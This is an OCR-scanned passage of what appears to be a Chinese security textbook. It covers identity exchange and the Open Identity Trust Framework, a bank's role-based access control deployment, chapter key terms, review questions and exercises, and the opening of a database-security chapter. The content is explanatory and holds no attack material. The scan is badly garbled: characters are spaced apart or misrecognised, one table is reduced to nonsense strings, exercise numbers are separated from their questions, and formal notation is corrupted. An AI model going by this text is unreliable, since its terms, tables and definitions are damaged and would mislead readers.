据 不 同 的 情境 ， 访 问 不 仅仅 取决 于 身份 ， 还 取决 于 请 求 者 和 资源 的 属性 。 


4.8.1 传统 的 身份 交换 方法 


在 线 或 网 络 交易 涉及 来 自 不 同 组织 的 各 方 ， 交 易 可 能 在 组 织 和 个 体 用 户 〈 如 在 线 客户 ) 之 
间 完 成 ， 通 常 需要 共享 身份 信息 。 这 些 信息 除了 包括 简单 的 名 字 或 数字 标识 之 外 ， 可 能 还 包括 
大 量 相关 属 性 。 不 论 是 披露 信息 方 还 是 接收 信息 方 ， 都 需要 对 与 该 信息 相关 的 安全 性 和 私密 性 
达到 一 定 的 信任 水 平 。 

图 4-13a 描述 了 传统 的 身份 信息 交换 技术 。 该 技术 包括 ， 用 户 开 发 随身 份 服务 提供 者 
( identity service provider) 采购 数字 身份 和 凭证 的 协议 ， 与 最 终 用 户 服务 与 应 用 提供 者 以 及 愿意 
依赖 身份 服务 提供 者 生成 的 吴 份 与 凭证 信息 的 各 方 签订 协议 。 





(可 能 的 合同 ) 
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a) 传统 身份 信息 交换 中 涉及 的 三 方 关系 





图 4-13 身份 信息 交换 方法 


图 4-13a 中 的 方法 必须 满足 大 量 要 求 。 依 赖 方 (relying party) 要 求 用 户 已 经 通过 某 种 保障 
程度 的 身份 认证 ， 身 份 服务 提供 者 对 用 户 属性 的 评估 是 准确 的 ， 身 份 服务 提供 者 提供 的 属性 是 
权威 的 。 身 份 服务 提供 者 要 求 确保 其 拥有 准确 的 用 户 信息 ， 并 且 如 果 其 分 享 信息 ， 依 赖 方 将 会 
依照 合同 条 款 和 法 律 要 求 使 用 这 些 信 息 。 用 户 要 求 确 保 可 以 将 敏感 信息 委托 给 身份 服务 提供 者 
和 依赖 方 ， 且 他 们 将 遵守 用 户 偏好 ， 尊 重用 户 隐 私 。 最 重要 的 是 ， 所 有 各 方 都 想 知 道 其 余 各 方 
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所 描述 的 情况 与 实际 情况 是 否 一 致 ， 以 及 其 余 各 方 的 可 靠 程 度 有 多 高 。 
48.2 ”开放 的 身份 信任 框架 


如 果 没 有 通用 的 标准 和 框架 ， 图 4-13a 中 的 协议 必须 被 复制 到 多 个 不 同情 境 中 。 一 个 更 可 
取 的 方法 是 ， 开 发 一 种 开放 的 、 标 准 化 的 方法 来 交换 可 信赖 的 身份 和 属性 。 下 面 ， 我 们 来 研究 
这 种 越 来 越 得 到 认可 的 方法 。 

不 斑 的 是 ， 这 个 主题 有 着 许多 有 麻烦 的 缩写 ， 因 此 我 们 首先 给 出 这 些 最 重要 的 定义 : 

e OpenID : 这 是 一 个 开放 性 标准 ， 人 允许 用 户 通 过 合作 网 站 ( 称 为 依赖 方 ) 提供 的 第 三 方 

服务 实现 身份 认证 ， 从 而 不 需 网 站 管理 员 上 自己 提供 相关 服务 ， 且 允许 用 户 整合 自己 的 
数字 身份 。 用 户 可 以 选择 自己 喜欢 的 OpenID 身份 提供 者 创建 账户 ， 然 后 使 用 这 些 账 
户 登 录 任 何 接受 OpenID 认证 的 网 站 。 

e OIDF : OpenID 基金 会 OpenID Foundation) 是 由 承诺 使 用 、 推 广 和 保护 OpenID 技术 

的 个 人 和 公司 组 成 的 非 营 利 性 国际 组 织 。OIDF 提供 OpenID 所 需 的 基础 设施 ， 并 且 帮 
助 促 进 和 支持 OpenID 的 推广 使 用 。 

e |CF : 信息 卡 基金 会 (Information Card Foundation) 是 由 致力 于 共同 发 展 信息 卡 生态 系 
统 的 公司 和 个 人 组 成 的 非 营 利 性 团体 。 信 息 卡 是 人 们 在 网 上 使 用 的 个 人 数字 身份 ， 是 
和 号 份 元 系统 的 重要 组 成 部 分 。 每 张 信 息 卡 看 起 来 都 具有 卡片 形状 的 图 片 和 与 之 关联 的 
卡 名 ， 这 使 得 人 们 能 够 组 织 自 己 的 所 有 数字 身份 并 且 很 便捷 地 选择 某 种 交互 环境 中 想 
用 的 数字 号 份 。 

OITF: 开放 身份 信任 框架 (Open Identity Trust Framework) 是 一 个 标准 化 的 、 开 放 性 的 
用 于 喘 份 和 属性 交换 的 信任 框架 规范 , H ODF A ICF 联合 开发 。 

© OIX: 开放 身份 交换 (Open Identity eXchange) 公司 是 一 个 独立 且 中 立 的 遵循 开放 身份 

信任 框架 模型 的 国际 证 书信 和 任 框架 提供 者 。 

© AXN : 属性 交换 网 络 (Attribute eXchange Network) 是 一 个 因特网 范围 的 在 线 网 关 ， 其 

使 映 份 服务 提供 者 和 依赖 方 能 够 以 可 负担 的 成 本 实现 高 效 访问 用 户 声称 、 许 可 且 已 验 
证 的 大 量 在 线 喘 份 属性 。 

系统 管理 者 需要 能 够 信任 与 主体 或 客体 相关 的 属性 是 权威 的 且 是 可 安全 交换 的 。 在 组 织 
部 提供 这 种 信任 的 一 个 方法 是 ICAM 模型 ， 具 体 来 说 是 ICAM 组 件 ( 见 图 4-12 )。 结 合 与 其 他 
组 织 共享 的 喘 份 联合 功能 ， 属 性 能 够 以 可 信赖 的 方式 交换 ， 以 支持 安全 访问 控制 。 

在 数字 身份 系统 中 ， 信 任 框 架 ( trust framework) 起 到 认证 程序 的 功能 。 它 使 得 接受 数字 
身份 凭证 的 一 方 〈 称 为 依赖 方 ) 能 够 信任 颁发 凭证 方 〈 称 为 身份 服务 提供 者 ) 的 身份 、 安 全 性 
和 隐私 策略 ， 反 之 亦 然 。OIX 将 信任 框架 更 形式 化 地 定义 为 ， 一 组 由 交易 各 方 中 的 每 一 方向 其 
对 手 方 做 出 的 可 验证 的 承诺 。 这 些 承 诺 包 括 : (1 ) 用 来 确保 承 诸 竞 现 的 控制 措施 (包括 规章 和 
合同 规定 的 义务 ) 和 (2 ) 履行 承诺 失败 时 的 补救 措施 。 信 任 框架 是 由 具有 相似 目标 和 观点 的 
人 组 成 的 团体 开发 的 。 它 规定 了 该 团体 参与 者 的 权利 和 职责 ; 制定 了 该 团体 特有 的 策略 和 标准 ; 
规定 了 用 来 提供 保障 的 团体 特有 的 过 程 和 规程 。 可 以 存在 不 同 的 信任 框架 ,而且 参 与 者 可 以 根 
据 其 特定 需求 来 裁剪 信任 框架 。 

图 4-13b 描述 了 OITF 所 包含 的 要 素 。 在 任何 组 织 或 机 构 内 部 ， 下 列 角 色 是 总 体 框架 的 一 
部 分 : 

© 依赖 方 (Relying Party, RP): 也 称 为 服务 提供 者 ， 是 问 特 定 用 户 交 付 服务 的 实体 。RP 必 

须 相 信和 其 目标 用 户 的 身份 和 属性 ， 并 且 必 须 依 赖 用 来 表明 这 些 身 份 和 属性 的 各 种 凭证 。 

e 主体 (subject): 他 们 是 RP 服务 的 用 户 ， 包 括 客户 、 职 员 、 贸 易 伙 伴 和 订户 。 
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e 属性 提供 者 (Attribute Provider, AP): AP 是 由 利益 共同 体 确认 能 够 验证 主体 所 提供 属 
性 的 实体 ， 它 通过 AXN 来 配备 ,创建 符合 AXN 规则 和 协议 的 属性 赁 证。 一些 AP 将 
是 某 种 信息 的 权威 来 源 ， 更 多 情况 下 AP 是 派生 属性 的 代理 。 

e 身份 提供 者 (IDentity Provider, IDP): IDP 是 能 够 鉴别 用 户 凭证 并 且 保 证 主体 名 字 (或 
笔名 、 社 会 网 络 地 址 ) 真实 性 的 实体 ， 它 通过 AXN 或 者 其 他 兼容 的 身份 和 访问 管理 
(IDAM) 系统 来 配备 ， 创 建 可 以 用 来 索引 用 户 属 性 的 数字 身份 。 


AXN 还 包括 下 列 重要 的 支持 要 素 : 
o 评估 者 (assessor): 评估 者 对 号 份 服务 提供 者 和 依赖 方 进行 评价 ， 证 明 他 们 有 能力 遵 循 
OITF 提供 者 的 蓝图 。 


e 审计 者 (auditor): 审计 者 可 以 被 召集 来 检查 各 方 的 工作 是 否 与 OTF 约定 保持 一 致 。 

e 争端 调解 者 (dispute resolver): 根据 OLX 指南 提供 仲裁 和 争端 解决 方案 。 

e 信任 框架 提供 者 ( trust framework provider): 信任 框架 提供 者 是 一 个 组 织 ， 其 将 策略 制 

定 者 的 要 求 转换 为 自己 的 信任 框架 的 蓝图 ， 并 以 与 OITF 规范 的 最 低 要 求 相 一 致 的 方 
式 着 手 构建 。 绝 大 多 数 情况 下 ， 对 于 每 一 个 确定 自己 适宜 与 AXN 互通 的 工业 部 门 或 大 
型 企业 ， 都 有 相当 明显 的 候选 组 织 来 承担 这 个 角色 。 

图 4-13b 中 的 箭头 实 线 表示 与 信任 框架 提供 者 之 间 关 于 实现 技术 、 运 行 和 法 律 要 求 达 成 的 
协议 。 篆 头 虚 线 表示 受 这 些 需 求 潜在 影响 的 其 他 协议 。 一 般 来 说 ， 图 4-13b 所 说 明 的 模型 是 按 
照 下 述 过 程 运行 的 : 参与 组 织 内 部 的 负责 人 确定 交换 他 们 有 权 处 理 的 身份 信息 的 技术 、 运 行 
和 法 律 要 求 。 然 后 ， 他 们 选择 OITF 提供 者 来 实现 这 些 要 求 。 这 些 OITF 提供 者 将 这 些 要 求 转 
换 为 可 能 包含 其 附加 条 件 的 信任 框架 的 蓝图 。OITF 提供 者 对 身份 服务 提供 者 和 RP 进行 审查 ， 
并 与 他 们 签订 合同 ， 当 进行 身份 信息 交换 时 遵守 信任 框架 要 求 。 合 同 也 包括 与 争端 调解 者 和 审 
计 员 相关 的 条 款 ， 以 便 合同 解释 和 执行 。 
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Dresdner 银行 实现 了 一 个 RBAC 系统 ， 它 可 以 作为 有 用 的 实际 例子 [SCHA01]。 银 行使 用 
多 种 计算 机 应 用 。 其 中 很 多 应 用 最 初 是 为 大 型 机 环境 开发 的 ， 这 些 老 应 用 中 有 一 些 现在 支持 客 
户 / 服 务 硕 网 络 ， 其 他 的 保留 在 大 型 机 上 。 服 务 右 上 也 有 新 应 用 。1990 年 以 前 ， 在 每 台 服 务 需 
和 大 型 机 上 采用 简单 的 DAC 系统 。 管 理 员 在 每 台 主 机 上 维护 本 地 访问 控制 文件 ， 为 每 台 主 机 
上 的 每 个 应 用 的 每 个 用 户 定义 访问 权 。 这 种 系统 操作 起 来 非常 烦琐 ， 非 常 耗 时 ， 易 于 出 错 。 为 
了 改进 系统 ， 银 行 引 进 了 RBAC 方案 。RBAC 是 系统 级 的 ， 它 将 访问 权 的 确定 划分 为 三 个 不 
同 的 管理 单元 ， 以 获得 更 高 的 安全 性 。 

该 机 构 中 的 角色 是 按 职位 和 工作 职责 相 结合 来 定义 的 。 表 4-$a 提供 了 一 些 例子 。 这 和 与 
NIST 标准 根据 工作 职责 定义 的 角色 概念 略 有 不 同 。 在 某 种 程度 上 ， 区 别 仅仅 是 术语 方面 的 。 
无 论 如 何 ， 银 行 的 角色 构成 使 得 开发 基于 职位 的 继承 层次 结构 很 自然 。 在 银行 内 部 ， 每 个 机 构 
的 职位 之 间 存 在 严格 的 偏 序 关系 ， 反 映 出 职责 和 权力 的 层次 结构 。 例 如 ， 部 门 总 监 、 团 队 经 理 
和 职员 等 职位 是 按 降序 排列 的 。 当 职位 与 工作 职责 结合 起 来 时 ， 就 会 产生 如 表 4-5b 所 示 的 访 
问 权 次 序 。 于 是 ， 金 融 分 析 师 / 团队 经 理 角 色 (角色 B) 比 金融 分 析 师 / 职员 角色 (角色 A) 具 
有 更 多 的 访问 权 。 该 表 说 明 角 色 B 与 角色 A 相 比 ， 对 于 三 个 应 用 具有 相同 的 或 更 多 的 访问 权 ， 
并 且 还 具有 第 四 个 应 用 的 访问 权 。 另 一 方面 ， 因 为 银行 业务 /团队 经 理 和 金融 分 析 师 / 职员 在 
不 同 的 职责 范围 工作 ， 所 以 他 们 之 间 没 有 层次 关系 。 我 们 因此 可 以 定义 角色 层次 如 下 : 一 个 角 
色 比 另 一 个 角色 高 级 ， 当 前 者 比 后 者 职位 高 且 二 者 职责 相同 。 角 色 层 次 使 得 按 表 4-5c 的 建议 
来 简化 访问 权 定义 成 为 可 能 。 
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表 4-5 银行 业 实例 的 职责 与 角色 


a) 职责 与 职位 
b) 许可 分 配 c) 具有 继承 的 许可 分 配 

ee] en | Bee wel am | vrn 
A | 衍生 贸易 | 1,2,3,7, 10,12 A 衍生 贸易 。 | 1,2,3,7,10, 12 

AT fa Re ABTA | 1,4,8,12,14, 16 

货币 市 场 T 具 | 12347 人 而 市 场 T 具 | 7 

RERI | 1,2,3,7,10,12,14 

FEYT B [mena |u 

TYC 私人 消费 者 工具 | 1,2,4,7 


在 原始 方案 中 ， 把 访问 权 直 接 分 配给 一 个 用 户 发 生 在 应 用 级 ， 并 与 一 个 应 用 关联 。 在 新 的 
方案 中 ， 应 用 管理 模块 确定 与 每 个 应 用 关联 的 访问 权 集合 。 然 而 ， 完 成 指定 任务 的 指定 用 户 可 
能 不 具有 与 该 应 用 关联 的 所 有 访问 权 。 当 用 户 调用 一 个 应 用 时 ， 应 用 根据 集中 提供 的 安全 配 
置 授 予 访问 权 。 分 离 的 授权 管理 将 访问 权 与 角色 关联 起 来 ， 其 基于 用 户 所 属 的 角色 来 创建 安 
全 配置 。 

用 户 被 静态 分 配角 色 。 原 则 上 ， 每 个 用 户 可 以 被 静态 分 配 至 多 四 个 角色 ， 当 调用 某 个 应 用 
时 选择 一 个 给 定 角 色 来 使 用 。 这 对 应 于 NIST 的 会 话 概念 。 实 践 中 ， 大 多 数 用 户 根 据 其 职位 和 
工作 职责 被 静态 分 配 一 个 角色 。 

所 有 这 些 成 分 都 在 图 4-14 中 做 了 描述 。 人 力 资源 部 给 每 个 将 要 使 用 系统 的 职工 分 配 一 个 
唯一 的 用 户 ID。 该 部 门 还 根据 用 户 的 职位 和 工作 职责 给 他 们 分 配 一 个 或 多 个 角色 。 用 户 /角色 
信息 被 提供 给 授权 管理 模块 ， 后 者 为 每 个 用 户 创建 一 个 安全 配置 ， 而 用 户 是 与 用 户 ID 和 具有 
一 组 访问 权 的 角色 相关 联 的 。 当 用 户 调 用 一 个 应 用 时 ， 这 个 应 用 查看 该 用 户 的 安全 配置 来 确定 
应 用 的 哪些 访问 权 对 于 具有 该 角色 的 用 户 是 有 效 的 。 

一 个 角色 可 以 用 来 访问 几 个 应 用 。 因 而 ， 与 一 个 角色 关联 的 访问 权 集 合 可 能 包含 未 与 用 户 
调用 的 任何 一 个 应 用 关联 的 访问 权 。 表 4-4b 说 明了 这 个 问题 。 角 色 A 具有 很 多 访问 权 ， 但 对 
其 调用 的 三 个 应 用 中 的 每 一 个 ， 都 只 有 这 些 访问 权 的 一 个 子 集 是 可 用 的 。 

这 个 系统 中 的 某 些 特征 是 我 们 感 兴趣 的 。 在 银行 内 部 ， 有 65 个 职位 ， 从 支行 的 职员 到 支 
行经 理 ， 再 到 董事 会 成 员 。 这 些 职位 与 人 力 资 源 数据 库 中 提供 的 368 个 不 同 工 作 职责 结合 
来 ， 形 成 潜在 的 不 同 角色 共 23 920 种 ， 但 现在 使 用 了 仅 约 1300 种 。 这 与 其 他 RBAC 实现 的 情 
况 一 致 。 平 均 起 来 ， 授 权 管 理 模块 每 天 分 发 给 应 用 42 000 个 安全 配置 。 
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图 4-14 


410 关键 术语 、 复 习题 和 习题 


关键 术语 


access control (访问 控制 ) 

access control list (访问 控制 列表 ) 

access management (访问 管理 ) 

access matrix (访问 矩阵 ) 

access right (访问 权 ) 

attribute (属性 ) 

Attribute-Based Access Control ( ABAC， 基 于 属性 
的 访问 控制 ) 

Attribute eXchange Network (AXN， 属 性 交换 网 络 ) 

attribute provider (属性 提供 者 ) 

auditor (审计 者 ) 

authorizations (授权 ) 

assessor (评估 者 ) 

capability ticket (能 力 权 证 ) 

cardinality (基数 ) 

closed access control policy (封闭 访问 控制 策略 ) 

credential (凭证 ) 

credential management (凭证 管理 ) 

Discretionary Access Control (DAC， 自 主 访 问 控制 ) 

dispute resolver (争端 调解 者 ) 

Dynamic Separation of Duty (DSD ， 动 态 职责 分 离 ) 

entitlement (资格 ) 

environment attribute (环境 属性 ) 

general role hierarchy (通用 角色 层次 ) 

group (组 ) 

identity (身份 ) 

Identity, Credential, and Access Management (ICAM, 


访问 控制 管理 实例 


寻 份 、 凭 证 和 访问 管理 ) 

identity federation (身份 联合 ) 

identity management (身份 管理 ) 

identity provider (身份 提供 者 ) 

Information Card Foundation (ICF ， 信 息 卡 基金 会 ) 

kernel mode (内 核 模式 ) 

least privilege (最 小 特权 ) 

limited role hierarchy ( 受 限 角色 层次 ) 

Mandatory Access Control (MAC， 强 制 访问 控制 ) 

mutually exclusive roles (EJF ff) 

object (客体 ) 

object attribute (客体 属性 ) 

open access control policy (开放 访问 控制 策略 ) 

Open Identity eXchange(OIX) Corporation (开放 身 
份 交 换 公 司 ) 

Open Identity Trust Framework ( OITF， 开 放 身 份 信 
任 框架 ) 

OpenID Foundation (OIDF, OpenID 基金 会 ) 

owner (所 有 者 ) 

permission( 许 可) 

policy (策略 ) 

prerequisite role (先决 角色 ) 

privilege (特权 ) 

protection domain (保护 域 ) 

relying part (依赖 方 ) 

resource (资源 ) 

right (权利 ) 
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role-based access control ( RBAC， 基 于 角色 的 访问 static separation of duty (SSD ， 静 态 职 责 分 离 ) 


控制 ) subject (主体 ) 
role constrains (角色 约束 ) subject attribute (主体 属性 ) 
role hierarchies (角色 层次 ) trust framework (信任 框架 ) 
separation of duty (职责 分 离 ) trust framework provider (信任 框架 提供 者 ) 
session (会 话 ) user mode (用 户 模 式 ) 
复习 题 
4.1 简 述 DAC 与 MAC 的 区 别 。 


4.2 
4.3 
4.4 
4.5 
4.6 
4.7 
4.8 
4.9 


RBAC 如 何 与 DAC Fil MAC 联系 起 来 ? 

列 出 并 定义 访问 控制 系统 中 的 三 类 主体 。 

在 访问 控制 语 境 中 ， 主 体 与 客体 的 区 别 是 什么 ? 
什么 是 访问 权 ? 

访问 控制 列表 与 能 力 权证 的 区 别 是 什么 ? 
什么 是 保护 域 ? 

简要 定义 图 4-8a 中 的 四 种 RBAC 模型 。 

列 出 并 定义 RBAC 基本 模型 中 的 四 种 实体 类 型 。 


4.10 描述 三 种 类 型 的 角色 层次 约束 。 


4.11 


在 NISTRBAC 模型 中 ，SSD 与 DSD 的 区 别 是 什么 ? 


习题 


4.1 


4.2 


4.3 


对 于 4.3 节 讨 论 的 DAC 模型 ， 保 护 状态 的 另 一 种 表示 方法 是 有 向 图 。 保 护 状 态 中 的 每 个 主体 和 每 个 
客体 都 用 节点 表示 (单个 节点 表示 既是 主体 又 是 客体 的 实体 )。 从 主体 指向 客体 的 有 向 线段 表示 访问 
权 ， 线 上 的 标记 定义 访问 权 。 
a. 画 出 对 应 于 图 4-2a 的 访问 矩阵 的 有 向 图 。 
b. 画 出 对 应 于 图 4-3 的 访问 矩阵 的 有 向 图 。 
c. 有 问 图 表示 与 访问 矩阵 表示 是 否 是 一 一 对 应 的 ? 解释 之 。 
a. 提出 一 种 用 访问 控制 列表 实现 保护 域 的 方法 。 
b. 提出 一 种 用 能 力 权 证 实现 保护 域 的 方法 。 
提示 : 两 种 情况 都 需要 中 间 层 次 。 
VAX/VMS 操作 系 用 四 种 处 理 需 访问 模式 为 进程 间 保 护 和 共享 系统 资源 提供 方便 。 访 问 模式 确定 : 
o 指令 执行 权 : 处 理 顺 可 以 执行 什么 指令 。 
e 存储 器 访问 权 : 当前 指令 可 以 访问 虚拟 内 存 的 哪些 单元 。 
四 种 模式 如 下 : 
内 核 : 执行 VMS 操作 系统 的 内 核 ， 包 括 存 储 器 管理 、 中 断 处 理 和 VO 操作 。 
执行 者 : 执行 大 量 操作 系统 服务 调用 ， 包括 文件 和 记录 (磁盘 和 磁带 ) 管理 例 程 。 
管理 者 : 执行 其 他 操作 系统 服务 ， 如 对 用 户 命 令 的 响应 。 
FAR: 执行 用 户 程序 和 编译 器 、 编 辑 器 、 链 接 器 、 调 试 器 等 实用 程序 。 
运行 于 较 低 特权 模式 的 进程 常常 需要 调用 运行 于 更 高 特权 模式 的 过 程 。 例 如 ， 用 户 程 序 请 求 操 
作 系 统 服务 。 这 个 调用 通过 使 用 改变 模式 (CHM) 指令 完成 ， 该 指令 产生 中 断 ， 将 控制 权 转 移 给 运 
行 于 新 访问 模式 的 例 程 。 然 后 执行 REI (从 异常 或 中 断 返 回 ) 指令 返回 。 
a. 大 量 操作 系统 具有 两 种 模式 : 内 核 模 式 和 用 户 模式 。 那 么 ， 提 供 四 种 模式 而 非 两 种 模式 的 优点 和 
缺点 分 别 是 什么 ? 
b. 你 能 设计 一 种 比 四 种 模式 还 多 的 情况 吗 ? 


4.5 


4.6 


4.7 


4.8 


4.9 


4.10 


4.1 


— 


4.12 
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前 一 道 题 讨论 的 VMS 方案 经 常 被 称 为 环保 护 结构 ， 如 图 4-15 所 示 。 实 际 上 ， 简 单 的 内 核 /用 户 方 
案 是 一 个 双环 结构 。 环 结构 访问 控制 系统 的 缺点 是 它 
违反 了 “最 小 特权 ”原则 。 例 如 ， 如 果 我 们 希望 一 个 
客体 在 环球 中 可 访问 ， 但 在 环 了 中 不 可 访问 ， 就 需要 
X<Y, 在 这 种 情况 下 ， 所 有 在 环 关 中 可 访问 的 客体 在 
环 了 中 也 可 访问 。 

a. 详细 解释 上 述 问 题 ， 并 说 明 为 什么 违反 了 最 小 特权 

原则 。 

b. 提出 一 种 环 结构 操作 系统 能 够 处 理 这 个 问题 的 方法 。 
UNIX 将 文件 目录 与 文件 同等 对 待 ， 就 是 说 ， 都 用 相 
同类 型 的 数据 结构 一 一 节点 来 定义 。 与 文件 一 样 ， 目 
录 包 括 9 位 的 保护 串 。 如 果 不 注 意 ， 就 会 产生 访问 控 
制 问题 。 例 如 ， 考 虑 一 个 保护 模式 为 644 (八进制 ) 的 
文件 ， 它 包含 在 保护 模式 为 730 的 目录 中 。 这 种 情况 
下 该 文件 可 能 受到 怎样 的 安全 威胁 ? 图 4-15 VAX/VMS 访问 模式 

在 4.4 节 描述 的 传统 UNIX 文件 访问 模型 中 ，UNIX 系统 对 新 创建 的 文件 和 目录 提供 了 默认 的 设置 ， 
属 主 可 以 随后 更 改 。 默 认 值 一 般 是 属 主 完全 访问 与 下 列 情况 之 一 的 组 合 : 同 组 用 户 和 其 他 用 户 没 有 
访问 权 ; 同 组 用 户 能 进行 读 / 执行 访问 ， 其 他 用 户 没有 访问 权 ; 同 组 用 户 和 其 他 用 户 都 能 进行 读 / 
执行 访问 。 简 要 讨论 每 种 情况 的 优 缺 点 ， 并 举例 说 明 每 种 情况 适用 于 哪 种 类 型 的 组 织 。 

考虑 为 用 户 Web 区 域 提供 访问 的 Web 服务 器 系统 的 用 户 账户 。 一 般 地 ， 在 用 户 的 主 目录 中 使 用 标 
准 的 目录 名 如 “public_html” 作 为 用 户 Web 区 域 。 然 而 ， 为 了 人 允许 Web 服务 需 访 问 这 个 目录 下 的 
页 面 ， 它 必须 至 少 具 有 对 该 用 户主 目录 的 搜索 (执行 ) 权 、 对 Web 目录 的 读 /执行 权 及 对 其 中 所 有 
页 面 的 读 权 。 考 虑 这 个 要 求 对 上 一 题 讨论 的 情况 的 影响 。 这 个 要 求 将 产生 什么 结果 ? 注意 Web Ak 
务 器 一 般 作为 特殊 用 户 执行 ， 它 所 在 的 组 不 能 包括 系统 中 大 多 数 用 户 。 是 否 在 有 些 环境 下 运行 这 种 
Web 服务 并 不 是 非常 合适 ?解释 之 。 
假定 一 个 系统 具有 NN 个 工作 职位 。 对 于 工作 职位 i， 用户 数 为 U;， 需 要 的 许可 数 为 Pi。 

a. 对 于 传统 的 DAC 方案 ， 必 须 定 义 多 少 个 用 户 与 许可 之 间 的 关系 ? 

b. 对 于 RBAC 方案 ， 必 须 定 义 多 少 个 用 户 与 许可 之 间 的 关系 ? 
NIST RBAC 标准 定义 了 受 限 角色 层次 ， 其 中 一 个 角色 可 以 具有 一 个 或 多 个 直接 祖先 ， 但 被 限制 只 能 
有 一 个 直接 后 代 。 那 么 ， 图 4-10 中 哪些 继承 关系 是 被 NIST 标准 中 的 受 限 角 色 层 次 所 禁止 的 ? 

Xİ F NIST RBAC 标准 ， 我 们 可 以 定义 通用 角色 层次 如 下 : RHCROLESXROLES 是 继承 关系 

ROLES 上 的 偏 序 关系 ， 写 为 三 。r 三 r» 仅 当 r 的 所 有 许可 也 是 的 许可 且 ri 的 所 有 用 户 也 是 坟 

的 用 户 。 定 义 集合 authorized permission (r) 为 与 角色 xi 关联 的 所 有 许可 的 集合 。 最 后 ， 节 点 x 是 
n WAREMAN nan, 4n2nb 与 的 角色 层次 间 没 有 角色 。 

a. 使 用 上 面 的 定义 (根据 需要 )， 给 出 通用 角色 层次 的 形式 定义 。 

b. 给 出 受 限 角 色 层 次 的 形式 化 定义 。 

在 4.8 节 的 例子 中 ， 用 符号 Role (x). Position 表示 与 角色 x 关联 的 职位 ， 用 Role (x). Function 表示 

与 角色 x 关联 的 职责 。 

a. 我 们 定义 这 个 例子 的 角色 层次 为 : 一 个 角色 比 另 一 个 角色 高 级 ， 当 前 者 比 后 者 职位 高 并 且 它 们 

的 职责 相同 。 形 式 化 表示 这 种 关系 。 
b. 另 一 种 备 选 的 角色 层次 是 : 一 个 角色 比 另 一 个 角色 高 级 ， 仅 当前 者 比 后 者 职位 高 ， 不 考虑 职位 
因素 。 形 式 化 表示 这 种 关系 。 

在 4.6 节 的 网 上 娱乐 商店 例子 中 ， 对 于 包含 高 级 用 户 和 普通 用 户 的 细 粒 度 策略 ， 列 出 需要 为 RBAC 
模型 定义 的 所 有 角色 和 所 有 特权 。 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 理解 数据 库 安全 不 同 于 普通 计算 机 安全 措施 的 独特 需求 ; 
概述 数据 库 管理 系统 的 基本 要 素 ; 

概述 关系 数据 库 系统 的 基本 要 素 ; 

定义 和 解释 SQL 注入 攻击 ; 

比较 和 对 比 数 据 库 访 问 控制 的 各 种 不 同方 法 ; 
解释 推理 在 数据 库 系统 中 是 如 何 导 致 安全 威胁 的 ; 

探讨 数据 库 系 统 中 加 密 技 术 的 应 用 问题 ; 

探讨 有 关 数 据 中 心 的 安全 问题 。 


本 章 讨 论 数据 库 领 域 独 有 的 安全 问题 ， 重 点 考虑 的 是 关系 数据 库 管 理 系统 (Relational 
DataBase Management System，RDBMS )。 关 系 方法 在 工业 、 政 府 和 研究 部 门 都 已 经 得 到 广泛 
应 用 ， 占 据 着 主导 地 位 ， 并 将 在 可 预见 的 未 来 继续 保持 这 种 势头 。 我 们 首先 概述 针对 数据 库 的 
安全 技术 的 需求 。 接 着 简要 地 介绍 数据 库 管理 系统 并 概述 关系 数据 库 。 然 后 讨论 数据 库 访问 控 
制 问题 及 推理 威胁 问题 。 接 下 来 分 析 数 据 库 加 密 问 题 。 最 后 我 们 将 介绍 与 部 署 大 型 数据 中 心 有 
关 的 安全 问题 。 


5.1 ”数据库 安全 需求 


一 些 组 织 或 机 构 的 数据 库 系统 趋向 于 将 敏感 信息 集中 存储 在 一 个 单一 的 逻辑 系统 中 。 这 些 
敏感 信息 涉及 : 
。 企业 的 财务 数据 
。 保密 的 电话 记录 
。 客户 和 员工 信息 ， 如 姓名 、 社 会 保险 号 、 银 行 账号 信息 和 信用 卡 信息 等 
。 专利 产品 信息 
。 保健 信息 和 医疗 记录 
对 于 许多 商家 和 其 他 的 组 织 或 机 构 来 讲 ， 人 允许 其 客户 、 合 作 伙 伴 和 员工 对 上 述 所 提 到 的 
信息 进行 访问 是 非常 必要 的 。 但 这 些 信息 有 可 能 成 为 来 自 内 部 和 外 部 的 诸如 滥用 和 非 授权 的 更 
!47| 改 等 威胁 的 目标 。 因 此 ， 针 对 数据 库 的 安全 问题 已 经 成 为 整个 组 织 或 机 构 安全 策略 的 重要 组 成 
148| 部分。 
[BENN06] 引用 了 一 些 资料 ， 用 以 说 明 数 据 库 安全 始终 没有 跟 上 数据 库 应 用 发 展 步伐 的 原 
因 。 这 些 原因 包括 : 
1. 现代 数据 库 管理 系统 ( DBMS) 的 复杂 程度 与 用 于 保护 这 些 系统 的 安全 技术 是 极为 不 匹 
配 的 。 事 实 上 ，DBMS 是 非常 复杂 的 、 大 型 的 软件 系统 ， 其 提供 了 很 多 的 工作 选项 ， 我 们 需要 
对 所 有 这 些 选项 有 清晰 的 理解 ， 接 下 去 才能 进行 很 好 的 保护 以 防止 数据 遭 到 破坏 。 尽 管 当前 安 
全 保护 技术 取得 了 很 大 进展 ,但 DBMS 的 复杂 程度 不 断 增加 ， 即 许多 新 的 特性 和 服务 不 断 地 
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2. 数据 库 系统 拥有 非常 成 熟 的 交互 协议 ， 被 称 为 结构 化 查询 语言 (SQL)， 它 非常 复杂 ， 例 
如 比 Web 服务 中 进行 交互 所 使 用 的 超 文本 传输 协议 (HTTP) 要 复杂 得 多 。 要 想 有 效 地 保证 数 
据 库 安 全 ， 需 要 在 全 面 理解 SQL 存在 的 弱点 的 基础 上 ， 制 定 适当 的 安全 策略 。 

3. 一 个 组 织 或 机 构 通 常 缺 少 专职 的 数据 库 安全 管理 人 员 ， 这 样 的 后 果 是 安全 需求 与 安全 保 
障 能 力 的 不 匹配 。 大 多 数组 织 都 有 员工 担任 数据 库 管 理 员 的 角色 ， 其 工作 是 管理 数据 库 系 统 ， 
目标 是 保证 数据 库 系统 的 可 用 性 、 性 能 、 正 确 性 和 易 用 性 。 这 类 系统 管理 员 可 能 具备 的 安全 技 
术 知 识 有 限 ， 掌 握 和 应 用 安全 技术 进行 管理 的 时 间 也 有 限 。 另 一 方面 ， 组 织 中 那些 负责 安全 的 
人 员 也 可 能 具有 较 少 的 数据 库 知 识 和 DBMS 技术 。 

4. 大 多 数 的 企业 环境 是 由 多 种 数据 库 平台 (如 Oracle, IBM DB2 和 Informix、 微 软 和 
Sybase 等 )、 企 业 平台 (如 Oracle 电子 商务 套件 、PeopleSoff、SAP 和 Siebel 等 ) 和 操作 系统 平 
